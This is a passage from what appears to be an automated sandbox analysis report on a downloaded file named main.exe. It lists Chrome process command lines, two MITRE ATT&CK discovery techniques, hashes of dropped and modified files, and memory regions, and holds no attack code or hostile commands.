  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=9556 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:5552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=9724 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:5620
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=9432 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:5696
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=9996 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:5764
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=8492 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:5908
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=10276 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:6104
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=6872 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:6132
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=9320 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:5876
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=48 --mojo-platform-channel-handle=10484 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:1952
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=49 --mojo-platform-channel-handle=10444 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:6044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=50 --mojo-platform-channel-handle=10628 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:608
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=51 --mojo-platform-channel-handle=10992 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:6176
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=52 --mojo-platform-channel-handle=10680 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:6184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=53 --mojo-platform-channel-handle=11228 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:6312
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=54 --mojo-platform-channel-handle=10640 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:6400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8196 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:8
  2⤵
  PID:6748
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10652 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:8
  2⤵
  PID:6760
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=57 --mojo-platform-channel-handle=5672 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:6940
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4580 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2788

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:1212

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5472

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
443910c67e6f610102baf8b6ba8bcc2a

SHA1
48480a253f8141416b72676d59afca56a156166d

SHA256
2907f5d011816294d7461e548007e7fef207610e0507cb28da40265288cc59aa

SHA512
389865dc015ed817d33bce170f63c8a38e32bfbb164f25ca610e65e41a47e0d1ca9339508d8686e1eabf556a37d1b463c611238ea3244769d0ebb994ddf33c60

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
9dec14c012040fa18ee2f6e9a0f2bc87

SHA1
0a630f37d56ff31bd5131dd0af9867e0fe5dfb2e

SHA256
942e3c8c9454d9e1af1d9fb258248754b2f71e24da38ffabc3e62551c400b5d8

SHA512
2e586b27495ac27762853e109d44aee930d9a151ce3647cae3d53360c96a357052115e490ab1c00c9c1956d5eff8276533975113d4805e7eb3c129221c076afd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\7d1528e1-284d-418e-8d22-e56b36b52b76.tmp

Filesize
16KB

MD5
9b5393ed2f0216308b7d59a2026c539c

SHA1
910e5cff7f745f275a690c2af6067e09f2e34425

SHA256
b6a083e23d7c4a5d9b7ce64de19aa843e735e46abe09b1dade02a636a143f9de

SHA512
ba06b04a0eb45d2cca3f8bab4543a05bdd27c92127643e4b3e4f5f8aee3b3cecd45b065af14c5421e139fd5827ac678ac716be9835f4c18318ddb0fc3609e070

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
14KB

MD5
15b7a5508581f490713e972a681907e3

SHA1
96f90297aa23771bbb88c9c51d5577bda2bcb5aa

SHA256
38c14b8613c7dfb8cf543f6deada5bc51a956934d5aaa019f0bf82584b24a7b2

SHA512
ee61d9b9051fa12c3214af62db300f00a29931d7aa7679d84e9bd568744e4b36e7e144e957008dafbd9215fdf01f6685ed81de2284ab5a97fdd3b7a585e3b70c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
6KB

MD5
f31493737803961f6efa63df702527a9

SHA1
df4a7143abaa7310703fb4247258493e1c5702be

SHA256
cfa2d16dcb61d3ca5bb24ea6934f3d75c0d8ffbf6f8061848586275de3981a3a

SHA512
67bf564134ef736efcbbd54ac2c54d69aa3f45b5784b094e454bb2c016eea31eee753c2cf5efb875b48d790a328dd204077eccc65791f6f6bb570ab4b2dd2789

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
5KB

MD5
20e47a6810d562ba7d06417bb1900a6c

SHA1
9ec863a3234bc09fe37d50840d04ba24ce541130

SHA256
68f3813799a49f630f6e4ab64ab532a42496b55c8a6de62c2ed0ab8835f7bc66

SHA512
d09c2ba5570d915ca7934c0af37d63472aea4c84c8a61847ed017a4edc880a524fe507bc8bdb01536292c27b16eef02435687c4516b2c33388aa2171cfd914da

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
4KB

MD5
44f1e06da540aa74a1447167f057a7f2

SHA1
ea7b3ccbd2e3657d1f7fb1b9dcf74511f21f7331

SHA256
8a2b3835b982ea46bbf32dc8ee0140f2ca960e981446a5b9d77e01206bbba825

SHA512
a8216b8587388dd9fb033a851c5b7bbc6bb16acc7d30d0ad4c6bf7da136341ee388c91f3bad67f3043dbf86534122c859251569e7f604cc41b5b5b3fd7cdff03

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
6KB

MD5
f579636c782740b1d0e78f4e30f07d49

SHA1
442492fc73a8f1abc9b55ba5c80b2e6dc1766d81

SHA256
260923f5b925aeb3fb9b07ecb3bfca06ca8e1ea9f8f89b9249192ad609a18940

SHA512
54d42e10a079c59865c2cd895babf01d2fa7f67656722e5e5a3cde2a24eb85e6040d6722209d1475fb8283f0518ff753fd153a5d14d132189995097f41000779

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
8af4e814667ce1582c1da6d01e29b24e

SHA1
eb6888b362cda87354a396fa0387013a839cdc94

SHA256
c490fa926959f6460883282273a729535df9aa4aecdeddfbf3a61258aad0b4c8

SHA512
f59fd430ba52b5b4ff679c467057dd085aa4455ff18d8c7172f050b866892530430f99c073ad3d03662ca27934ee0797ae6ee062e1e280b04429a80860109cac

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
a9baa4c39025ed6a807289251383dff2

SHA1
78d424740a7d9c94c17e48497605f2ac7259f634

SHA256
7bd699bad4a1bed4d599cb13c7eb183ae9131ac21399b1fa708d576347e894ae

SHA512
ae38e8cc661f185529f108feac2c1995e1591f500ae6db2083a237667b23eee4dfc5d00d476d25bb041bb0f28e0dfbcd457d002c2dcdd7c574a3c27f88882e6e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
0c5f7c8006e333eb49d3ed0e859a9446

SHA1
553c96babc376d31fd8d4f2ce067d830cc4d85c8

SHA256
41a5a64a890d976b84a7c7547ee2a6b5da8f38261161e0aa7080e633b324fe59

SHA512
5e9fc346eebce5421ca30a666ea4802347e07e3b50b97ed950e73a5306b3cd10f9cea815880e120a0266c2ec184e5a283d495918d534e31e0b81131f07f4501d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
72KB

MD5
b02cbe6b254d0149feeddbc9235b5d70

SHA1
5264552e585b6b286732d727445f058b7be09da2

SHA256
21966280d789b0dd2b9edb34e3c6e9c7fe0dbd65e7aebc604a69477a2645fbd6

SHA512
d4955681d0e0bbe2bfd304e45667997b14f4bae6d561f241ca00146d78cd5bea26b6295a4c8fbc19d9a356dadeee61e5934c8927983c5e190a9d653ae696e597

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
203KB

MD5
8e703890d8f8e9c819d6a654d8b21d43

SHA1
04d6aa60305a41d08e37db941946ee6af1e9936e

SHA256
b2543fc3086b21dee437cc8d36ebc29c291929a39a6a34ab4bd24b385609d16c

SHA512
7e1c790657de62009362ff0e93b9642d7ed6372d2f4fb963977529b693b6d4389b8239493477b791fe424a75c621875677cbdd541cc043c8a07bf3e95fe0ae22

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
202KB

MD5
143bbac619cde6cabd98b4dd262b8cdf

SHA1
252b2b3c6ed4820ea434d0bcc3c53a06b69a7647

SHA256
4806cd15211f9d081be311e67d52e5a42db08a8e6bd54ad8db89b908f9dba9ef

SHA512
a2c3c3849f6ec1dd014a449d83bc16686a13914715b2bea12d17a5a96393992c436c0a4e3e04210e4b26436c420933551798b93f1b0c45581700b9ae76285718

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
202KB

MD5
caad1ca881aa05118a2f9f11291932f4

SHA1
e8472029b5b20f9895e58f9eb70e8e2923e0cdee

SHA256
1cead752cfafaf4ff7503f979334e95f315006119e371fd7005f9314eab52e13

SHA512
a8acb474f8ef9623e4ba0b527581162469a037eb2eedaffb2d1abf823365fc33a076408b45cdc58b684da2853ceafa4da857461966394585284dbcb05cb80121

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2pqhzdzg.vms.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 929754.crdownload

Filesize
2.5MB

MD5
3e564e571a593bc773ebb7c0548605c2

SHA1
9c52c240c49a3005bfe90cf11fa5abdb9a6170dc

SHA256
b5f813ada86f138a68cb88bba0fcd82f5de9a5e9b8a7980f14effb02baf33cca

SHA512
8e0d9ea600befb8d185a5b0eb7b296cf318dfef47e37d7c9696a55b693dbe953e7ec10fda3564648e265ead0daeda266cd4a6ce14f49281dc6036b4c08c19486

Download Submit
C:\Users\Admin\Downloads\main.exe

Filesize
2.5MB

MD5
3e564e571a593bc773ebb7c0548605c2

SHA1
9c52c240c49a3005bfe90cf11fa5abdb9a6170dc

SHA256
b5f813ada86f138a68cb88bba0fcd82f5de9a5e9b8a7980f14effb02baf33cca

SHA512
8e0d9ea600befb8d185a5b0eb7b296cf318dfef47e37d7c9696a55b693dbe953e7ec10fda3564648e265ead0daeda266cd4a6ce14f49281dc6036b4c08c19486

Download Submit
C:\Users\Admin\Downloads\main.exe

Filesize
2.5MB

MD5
3e564e571a593bc773ebb7c0548605c2

SHA1
9c52c240c49a3005bfe90cf11fa5abdb9a6170dc

SHA256
b5f813ada86f138a68cb88bba0fcd82f5de9a5e9b8a7980f14effb02baf33cca

SHA512
8e0d9ea600befb8d185a5b0eb7b296cf318dfef47e37d7c9696a55b693dbe953e7ec10fda3564648e265ead0daeda266cd4a6ce14f49281dc6036b4c08c19486

Download Submit
memory/508-339-0x0000027125390000-0x00000271253A0000-memory.dmp

Filesize
64KB

Download
memory/508-302-0x0000027125DE0000-0x0000027125E56000-memory.dmp

Filesize
472KB

Download
memory/508-282-0x000002710B4D0000-0x000002710B4F2000-memory.dmp

Filesize
136KB

Download
memory/508-272-0x0000027125390000-0x00000271253A0000-memory.dmp

Filesize
64KB

Download
memory/508-273-0x0000027125390000-0x00000271253A0000-memory.dmp

Filesize
64KB

Download
memory/4824-343-0x0000000000400000-0x0000000000515000-memory.dmp

Filesize
1.1MB

Download